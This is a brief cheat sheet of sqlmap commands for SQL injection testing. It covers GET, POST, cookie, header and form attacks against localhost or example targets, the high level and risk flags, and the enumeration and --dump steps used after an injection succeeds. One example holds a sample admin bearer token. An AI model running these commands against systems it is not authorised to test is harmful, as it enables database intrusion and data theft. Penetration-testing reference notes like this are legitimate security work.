[SQL] sqlmap


Aim target

Basic usage

sqlmap -u "http://localhost:8080/user.php?id=7"

GET attack

Basic usage

sqlmap -u "http://localhost:8080/user.php?id=7"

With Query

sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"

With Parameter and with delay

sqlmap -u "" -p "a" --tables --delay=5

Perform in-depth and risky attacks

sqlmap -u "" --level=3 --risk=3

Enumerate DBMS database tables with tables

sqlmap -u "" -p "username" --level=3 --tables

With Headers

sqlmap -u "" --level=3 --headers="Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InN1cGVyYWRtaW4iLCJzdWIiOjEsInJvbGUiOiJhZG1pbiIsImRvY3Rvcl9jb2RlIjpudWxsLCJpYXQiOjE2NjI2NDg5MTEsImV4cCI6MTY5NDE4NDkxMX0.5zjJ0fJSX_s76b5BScUBDMpDOO0GpMrnA_0L1TCu8lM"

With cookies

sqlmap -u "http://localhost:8080/admin.php" --cookie "customerId=591edabaab5b52292042df8a"

POST attack

Basic usage

sqlmap -u "http://localhost:8080/admin.php" --data="id=1&name=admin"
sqlmap -u "http://localhost:8080/login/password" --data="username=tom&password=123"

With random-agent

sqlmap -u "" --data="username=tom&password=123" --level=3 --random-agent --ignore-code 401
sqlmap -u "" --data="username=tom&password=123&re_password=123" --level=3 --random-agent --ignore-code 401

Form attack

sqlmap -u "http://localhost:8080/admin.php" --forms

Basic Tag

Shows list: --dbs
Shows all tables: -D 'db_name' --tables
Set Url: -u 

After success to injections
Get DB Name: --dbs OR --current-db
Get Tables: --tables
Get col: --columns 
Get datas from tables: --dump